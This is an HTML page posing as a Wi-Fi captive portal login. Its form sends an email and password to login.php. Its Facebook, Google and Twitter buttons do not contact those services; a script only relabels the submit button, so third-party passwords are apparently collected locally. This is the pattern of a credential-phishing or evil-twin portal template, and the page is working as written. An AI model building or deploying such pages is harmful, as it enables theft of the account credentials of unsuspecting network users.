
<!DOCTYPE html>
<html lang='en'>
<head>
    <meta charset='UTF-8'>
    <meta name='viewport' content='width=device-width, initial-scale=1.0'>
    <meta http-equiv='X-UA-Compatible' content='ie=edge'>
    <title>Wi-fi Login</title>
    <style>
        * {
            margin: 0px;
            padding: 0px;
        }

        body {
            background-color: #eee;
        }

        #wrapper {
            width: 500px;
            height: 50%;
            overflow: hidden;
            border: 0px solid #000;
            margin: 50px auto;
            padding: 10px;
        }

        .main-content {
            width: 250px;
            height: 40%;
            margin: 10px auto;
            background-color: #fff;
            border: 2px solid #e6e6e6;
            padding: 40px 50px;
        }

        .input,
        .input {
            width: 100%;
            margin-bottom: 30px;
            padding: 10px;
            border: 1px solid #dbdbdb;
            box-sizing: border-box;
            border-radius: 20px;
        }

        .btn {
            width: 100%;
            background-color: rgb(36, 179, 0);
            border: transparent;
            padding: 10px;
            color: #fff;
            font-weight: bold;
            cursor: pointer;
            border-radius: 20px;

            transition: 0.5s;
        }

        input:focus {
            border-color: lightblue;
            padding: 13px;
            opacity: .5;
        }
        .sub-content {
            width: 250px;
            height: 40%;
            margin: 10px auto;
            border: 1px solid #e6e6e6;
            padding: 20px 50px;
            background-color: #fff;
            
        }

        .text-head{
            text-align: center;
            font-family: sans-serif;
            color: grey;
            text-transform: uppercase;
        }

        .chkbox-text{
            text-align: center;
            color: grey;
            font-family: sans-serif;
        }

        .s-part {
            text-align: center;
            color: rgb(255, 40, 40);
            font-family:'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;
        }

        #fb-btn{
            background-color: #060a0e;
            margin: 5px;
        }

        #gmail-btn{
            background-color: rgb(245, 34, 34);
            margin: 5px;
        }

        #twitter-btn{
            background-color:  rgb(29, 161, 242);
            margin: 5px;
        }
        .container, html, body{
            height: 100%;
        }
        .container{
            justify-content: center;
            align-items: center;
        }
        .box{
            left: 50%;
            top: 100%;
            position: absolute;
            transform: translate(-50%, -50%)
        }

    </style>
</head>
<body>
        <div class="container">
            <div class="box">
                    <div id='wrapper'>
                            <div class='main-content'>
                              
                                <p class="text-head">wi-fi login</p>
                                <br>
                                <form action='login.php' method='post'>
                                        <div class='l-part'>
                                            <input type='email' placeholder='Email' class='input' name='username' required>
                                            <input type='password' placeholder='Password' class='input' name='password' required/>
                                            <input type='submit' name="submit" value='Log in' class='btn' id="submit"/>
                                            <input type="checkbox" style="margin-top:10px" name="agree" id="agree" required><label for="agree" class="chkbox-text">I agree about terms of usage </label>
                                        </div>
                                </form>
                
                            </div>
                
                            <div class="sub-content">
                                <p class="text-head">Dont have account?</p>
                                <p class="text-head">Log In with social media</p>
                                <br> <br>
                                <input type="submit" value="Facebook" class="btn" id="fb-btn">
                                <input type="submit" value="Google" class="btn" id="gmail-btn">
                                <input type="submit" value="Twitter" class="btn" id="twitter-btn">
                            </div>
                
                        </div>
            </div>
        </div>

        
        
</body>
<script>
    var fbbtn = document.getElementById("fb-btn");
    var twitterbtn = document.getElementById("twitter-btn")
    var googlebtn = document.getElementById("gmail-btn");

    fbbtn.addEventListener("click", function(){
        fbbtn.style.display = "none";
        submit.style.backgroundColor = "#44609c";
        submit.value = "Facebook Login";
        if(googlebtn.style.display == "none") googlebtn.style.display = "inline";
        if(twitterbtn.style.display == "none") twitterbtn.style.display = "inline";
    })
    googlebtn.addEventListener("click", function(){
        googlebtn.style.display = "none";
        submit.style.backgroundColor = "rgb(245, 34, 34)";
        submit.value = "Google Login";
        if(twitterbtn.style.display == "none") twitterbtn.style.display = "inline";
        if(fbbtn.style.display == "none") fbbtn.style.display = "inline";
    })
    twitterbtn.addEventListener("click", function(){
        twitterbtn.style.display = "none";
        submit.style.backgroundColor = "rgb(29, 161, 242)";
        submit.value = "Twitter Login";
        if(googlebtn.style.display == "none") googlebtn.style.display = "inline";
        if(fbbtn.style.display == "none") fbbtn.style.display = "inline";
    })
</script>
</html>